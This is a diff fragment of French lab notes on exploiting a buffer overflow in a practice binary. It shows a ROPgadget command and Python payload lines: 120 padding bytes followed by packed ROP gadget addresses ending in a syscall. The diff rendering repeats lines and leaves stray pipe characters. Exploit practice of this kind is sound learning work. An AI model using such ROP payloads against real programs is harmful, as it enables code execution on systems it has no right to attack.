|
|
|
@ -11,6 +11,9 @@ docker run --rm -it secu
|
|
|
|
python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
|
|
|
|
python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
|
|
|
|
|
|
|
|
|
|
|
|
dans un fichier python :
|
|
|
|
dans un fichier python :
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
on copie colle la partie 5 avec en plus:
|
|
|
|
|
|
|
|
|
|
|
|
p = b'A' * 120 => buffer overflow
|
|
|
|
p = b'A' * 120 => buffer overflow
|
|
|
|
p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul
|
|
|
|
p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul
|
|
|
|
|
|
|
|
|
|
|
|
|
